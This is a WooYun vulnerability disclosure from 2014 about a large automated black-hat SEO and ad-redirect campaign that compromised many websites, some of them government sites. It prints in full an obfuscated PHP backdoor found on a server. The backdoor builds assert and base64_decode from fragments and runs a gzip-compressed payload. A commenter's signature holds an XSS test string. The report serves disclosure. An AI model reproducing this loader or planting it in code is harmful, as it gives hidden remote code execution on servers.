当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087519

漏洞标题:高级自动化黑产大揭秘(附部分广告推送代码分析)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-12-17 17:51

修复时间:2015-01-31 17:52

公开时间:2015-01-31 17:52

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-22: 厂商已经确认,细节仅向厂商公开
2015-01-01: 细节向核心白帽子及相关领域专家公开
2015-01-11: 细节向普通白帽子公开
2015-01-21: 细节向实习白帽子公开
2015-01-31: 细节向公众公开

简要描述:

大量网站遭到挂马,高级黑产

详细说明:

百度搜 http://222.186.12.144:8888/
http://www.baidu.com/s?wd=http%3A%2F%2F222.186.12.144%3A8888%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&oq=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5&inputT=799&rsv_pq=85d5d28100007683&rsv_t=022cQ4rxhIN8l4PiN1qvrX3GHzbAFvPglZ9yczNixGk6kNE2iZFnRkaYpCLDsZ5Y%2F0SY&rsv_n=2&rsv_sug3=16&rsv_sug4=586&rsv_sug1=16&rsv_sug=1&bs=%E4%BA%92%E8%81%94%E7%BD%91%E5%BA%94%E6%80%A5%E4%B8%AD%E5%BF%83

1.png


http://gxlyjt.com/index.php?gxlyjt=130&wap=1
http://www.cqwswsjds.com/index.php/Content/index/type/85.html?cqwswsjds=1661
http://www.cqkxajj.gov.cn/index.php/Content/index/type/209.html?gov=748
政府网站还是挺多的
这是我检测服务器的时候发现的 在php 发现了一段意外的代码

$dw_dir = "";
$dw_gb = 1; 
$dw_dan = 0;
    $_MYSQL = /*dbname*/"as"/*-ip-*/."s";
    $SQL_STMTLY = /*stmt*/"b"."a"./*-$mysql_*/"se";
    $_MYSQL = $_MYSQL ."ert";
    $GETIPNAME = "abcdefghicklmnopqrst";
    $SQL_STMTLY = $SQL_STMTLY./*stmt-*/"64_"./*stmt*/"de"/*d**e*d*e8d**e**/."code";
    $SQL_CONNECT_STRS = $SQL_STMTLY;
    $GETIPNAMEy = "gz_".substr( $SQL_STMTLY, 7,6);
    $SQL_CONNECT_STRSectstr = "ZnVuY3Rpb24gZ3pfZGVjb2RlKCRkYXRhKXskZmxhZ3MgPSBvcmQoc3Vic3RyKCRkYXRhLCAzLCAxKSk7JGhlYWRlcmxlbiA9IDEwOyRleHRyYWxlbiA9IDA7JGZpbGVuYW1lbGVuID0gMDtpZiAoJGZsYWdzICYgNCkgeyRleHRyYWxlbiA9IHVucGFjaygndicgLHN1YnN0cigkZGF0YSwgMTAsIDIpKTskZXh0cmFsZW4gPSAkZXh0cmFsZW5bMV07JGhlYWRlcmxlbiArPSAyICsgJGV4dHJhbGVuO31pZiAoJGZsYWdzICYgOCkkaGVhZGVybGVuID0gc3RycG9zKCRkYXRhLCBjaHIoMCksICRoZWFkZXJsZW4pICsgMTtpZiAoJGZsYWdzICYgMTYpJGhlYWRlcmxlbiA9IHN0cnBvcygkZGF0YSwgY2hyKDApLCAkaGVhZGVybGVuKSArIDE7aWYgKCRmbGFncyAmIDIpJGhlYWRlcmxlbiArPSAyOyR1bnBhY2tlZCA9IEBnemluZmxhdGUoc3Vic3RyKCRkYXRhLCAkaGVhZGVybGVuKSk7aWYgKCR1bnBhY2tlZCA9PT0gRkFMU0UpJHVucGFja2VkID0gJGRhdGE7cmV0dXJuICR1bnBhY2tlZDt9DQo=";
    $IPADDRESS = $SQL_CONNECT_STRS(( $SQL_CONNECT_STRSectstr ));
    $MYSQL_CONNECTLY = $_MYSQL;
    $SQL_CONNECT_STRSECT = $SQL_STMTLY[3]./*ly**/"v".$SQL_STMTLY[1].$GETIPNAME[11]."( ".$GETIPNAMEy."($SQL_CONNECT_STRS('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')));";
    @$MYSQL_CONNECTLY( $SQL_CONNECT_STRSECT.$IPADDRESS );


漏洞证明:

2.jpg


包括色情网站的推广

3.jpg


当你访问那些链接的时候,除了跳转推广的网站外,貌似还更新下发任务,实现全自动了
在cache 目录下发现了大量的文件
每个文件夹差不多6-15万个文件不等 大约有1万多个文化夹
应该是下发的任务

QQ图片20141217153208.jpg


部分代码:
http://drops.wooyun.org/wp-content/uploads/2014/12/AD_PUSH.zip

修复方案:

他们比我懂

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-22 14:54

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-17 17:56 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    尼玛

  2. 2014-12-17 17:56 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    路人甲....

  3. 2014-12-17 17:56 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    尼玛

  4. 2014-12-17 17:57 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    黑阔你好

  5. 2014-12-17 17:57 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    高级

  6. 2014-12-17 18:00 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    自动化

  7. 2014-12-17 18:00 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    一个网站下发的推广任务都十几万,好吓人,还带自动更新

  8. 2014-12-17 18:05 | 齐博开发 ( 路人 | 还没有发布任何漏洞 | 不要冒然的评价我,你只是知道我的名字,却...)

    几十万个都是少的 清理服务器几万个文件夹 每一个文件夹6-8万个文件 太可恶了

  9. 2014-12-17 18:22 | 龍 、 ( 普通白帽子 | Rank:398 漏洞数:135 | 你若安好 我就是晴天)

    自动生成的?寄生虫?

  10. 2014-12-17 18:51 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    遇到黑帽seo 是最寒心的 。哈哈

  11. 2014-12-17 19:28 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    屌!

  12. 2014-12-17 19:29 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  13. 2014-12-17 19:29 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    统计网站么

  14. 2014-12-17 19:31 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    洞主干这行多久了,揭秘行里内幕啊!

  15. 2014-12-17 19:34 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    这么牛逼

  16. 2014-12-17 19:39 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    这个吊

  17. 2014-12-17 20:41 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    告诉我是谁匿名的

  18. 2014-12-17 20:48 | 内谁 ( 实习白帽子 | Rank:81 漏洞数:5 | 我是内谁)

    关注下,看看洞主到底是什么仇什么怨……

  19. 2014-12-17 21:08 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    搞黑产哪家强?路人甲最强!!!

  20. 2014-12-17 22:09 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @齐博开发 齐博开发。。。。。。。。。

  21. 2014-12-18 02:58 | 拖延症晚癌患者 ( 路人 | Rank:0 漏洞数:2 | ヾ(。`Д´。))

    卧槽,自动化。

  22. 2014-12-18 07:19 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    看了洞主原来是个经验丰富的黑产大手 有一天我孙子Helen惹了他 然后洞主决定改过自新重新做人 因为已经赚了n辈子用不完的钱 于是乎来改邪归正向乌云社区众多白帽子和记者透露这个产业的猥琐招术 @U神你怎么看

  23. 2014-12-18 09:00 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    在乌云学seo找谁

  24. 2014-12-18 10:08 | hydoor ( 普通白帽子 | Rank:147 漏洞数:32 | -Q)

    学黑帽哪里强?中国乌云路人甲!

  25. 2014-12-18 10:11 | cncert国家互联网应急中心(乌云厂商)

    mark,一直没有机会深入案例.现在可以了.

  26. 2014-12-18 11:39 | hydoor ( 普通白帽子 | Rank:147 漏洞数:32 | -Q)

    @cncert国家互联网应急中心 为何我提交了个洞一直不确认呢?直辖市电视台主站注入root?

  27. 2014-12-22 15:41 | Power ( 实习白帽子 | Rank:54 漏洞数:22 | 还需要等待.........)

    mark!!

  28. 2014-12-22 16:12 | bingfeng ( 路人 | Rank:10 漏洞数:3 | 万丈红尘三杯酒,千秋大业一壶茶。)

    要火呀~

  29. 2014-12-22 17:05 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    学习

  30. 2014-12-25 11:10 | Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)

    自动化黑产....期待公开..

  31. 2015-01-11 14:59 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    给个压缩包,但是有密码,。。。。。

  32. 2015-01-21 16:09 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    那么吊~。。。

  33. 2015-01-21 16:43 | haohao ( 路人 | Rank:20 漏洞数:2 | 攻城狮)

    压缩包的密码是啥?

  34. 2015-01-31 18:07 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    牛了。

  35. 2015-01-31 18:49 | 轨迹 ( 路人 | Rank:5 漏洞数:3 | 321)

    password

  36. 2015-01-31 20:30 | 瑾此而已 ( 路人 | 还没有发布任何漏洞 | 专业脱裤三十年)

    解压密码-

  37. 2015-02-01 10:16 | 老黑 ( 普通白帽子 | Rank:161 漏洞数:61 | 最爱红颜不老。)

    看看洞主到底是什么仇什么怨

  38. 2015-02-03 14:08 | 刘糖糖他爸 ( 路人 | Rank:0 漏洞数:1 | 这个人很简单···)

    Mark!! 原来高手都叫路人甲

  39. 2015-02-04 19:48 | me1ody ( 路人 | Rank:26 漏洞数:15 | 乌云临时工)

    Mark!! 原来高手都叫路人甲

  40. 2015-02-06 15:07 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    解压密码多少,求楼主显身!

  41. 2015-03-24 15:27 | Mark ( 路人 | Rank:8 漏洞数:2 | 渗透你的心)

    卤煮被查水表了?

  42. 2015-04-03 14:32 | 孤独男孩 ( 路人 | Rank:8 漏洞数:5 | 专注网络信息安全,漏洞发掘,代码审核,云...)

    解压密码????